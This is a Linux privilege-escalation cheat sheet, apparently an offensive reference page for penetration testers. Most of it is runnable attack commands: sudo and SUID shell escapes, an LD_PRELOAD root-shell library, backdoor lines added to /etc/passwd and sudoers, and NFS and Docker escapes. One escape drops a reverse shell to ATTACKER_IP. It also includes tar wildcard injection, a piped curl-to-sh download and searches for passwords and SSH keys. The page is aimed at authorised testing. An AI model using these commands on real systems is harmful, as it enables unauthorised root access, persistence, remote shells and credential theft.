LinuxPrivilegeEsc
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
ENUMERATION#
# System info uname -a cat /etc/*release* cat /proc/version hostname # Current user id whoami groups cat /etc/passwd cat /etc/shadow # if readable cat /etc/group # Network info ifconfig -a ip addr netstat -antup ss -tulpn route -n cat /etc/hosts cat /etc/resolv.conf arp -a # Running processes ps aux ps -ef top -n 1 # Installed packages dpkg -l # Debian/Ubuntu rpm -qa # RHEL/CentOS
SUID/SGID BINARIES#
# Find SUID binaries find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null # Find SGID binaries find / -perm -2000 -type f 2>/dev/null find / -perm -g=s -type f 2>/dev/null # Both SUID and SGID find / -perm -6000 -type f 2>/dev/null # Common exploitable SUID binaries (check GTFOBins) /usr/bin/find /usr/bin/vim /usr/bin/awk /usr/bin/nmap /usr/bin/less /usr/bin/more /usr/bin/nano /usr/bin/cp /usr/bin/mv /usr/bin/man /usr/bin/env /usr/bin/python /usr/bin/perl /usr/bin/ruby
SUDO EXPLOITATION#
# Check sudo permissions
sudo -l
# Common sudo exploits
sudo -u#-1 /bin/bash # CVE-2019-14287
sudo vim -c ':!/bin/bash'
sudo find /etc -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo nmap --interactive # Older versions
sudo python -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/passwd # Then: !/bin/bash
sudo man man # Then: !/bin/bash
sudo env /bin/bash
sudo ed # Then: !/bin/bash
sudo git -p help config # Then: !/bin/bash
sudo ftp # Then: !/bin/bash
# LD_PRELOAD exploitation (if env_keep+=LD_PRELOAD)
# Create malicious library:
#include <stdio.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Run: sudo LD_PRELOAD=/tmp/shell.so <allowed_command>
CAPABILITIES#
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Exploit cap_setuid
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Exploit cap_dac_override (read any file)
# Exploit cap_chown (change file ownership)
CRON JOBS#
# View cron jobs cat /etc/crontab ls -la /etc/cron.* cat /var/spool/cron/crontabs/* crontab -l systemctl list-timers # Check for writable scripts in cron ls -la /etc/cron.d/ ls -la /var/spool/cron/ # PATH exploitation in cron # If cron runs script without full path: # Create malicious script in /tmp or other PATH directory
WRITABLE FILES/DIRECTORIES#
# World-writable files find / -writable -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null # World-writable directories find / -writable -type d 2>/dev/null find / -perm -2 -type d 2>/dev/null # Writable /etc/passwd echo 'newroot:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0:root:/root:/bin/bash' >> /etc/passwd # Password: password (or generate with openssl passwd -1 -salt salt password) # Writable /etc/shadow # Replace root hash # Writable sudoers echo "username ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
PATH VARIABLE MANIPULATION#
# If SUID binary calls command without full path export PATH=/tmp:$PATH echo '/bin/bash' > /tmp/commandname chmod +x /tmp/commandname
KERNEL EXPLOITS#
# Check kernel version uname -r # Common kernel exploits # DirtyCow (CVE-2016-5195) - Linux < 4.8.3 # DirtyPipe (CVE-2022-0847) - Linux 5.8+ # PwnKit (CVE-2021-4034) - Polkit pkexec # Search for exploits searchsploit linux kernel <version>
NFS#
# Check for no_root_squash cat /etc/exports showmount -e <target> # If no_root_squash, mount and create SUID binary mkdir /tmp/nfs mount -t nfs <target>:/share /tmp/nfs cp /bin/bash /tmp/nfs/ chmod +s /tmp/nfs/bash # On target: /share/bash -p
DOCKER ESCAPE#
# Check if in docker cat /.dockerenv ls -la /.dockerenv # Check docker socket ls -la /var/run/docker.sock # If docker socket is accessible docker run -v /:/mnt --rm -it alpine chroot /mnt bash # Privileged container escape mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/bash' > /cmd echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /cmd chmod +x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
MYSQL#
# MySQL running as root mysql -u root -p # At mysql prompt: \! /bin/bash # UDF exploitation # If plugin directory is writable
WILDCARD INJECTION#
# tar with wildcard echo "" > "--checkpoint=1" echo "" > "--checkpoint-action=exec=sh shell.sh" # Wait for tar * to execute # chown with wildcard echo "" > "--reference=/etc/passwd"
ENUMERATION SCRIPTS#
# LinPEAS curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # LinEnum ./LinEnum.sh -t # Linux Exploit Suggester ./linux-exploit-suggester.sh # pspy - monitor processes ./pspy64
PASSWORD HUNTING#
# Search for passwords
grep -r "password" /home /var/www /opt 2>/dev/null
grep -r "pass" /etc 2>/dev/null
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.xml" -exec grep -l "password" {} \; 2>/dev/null
cat ~/.bash_history
cat /home/*/.bash_history
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/id_rsa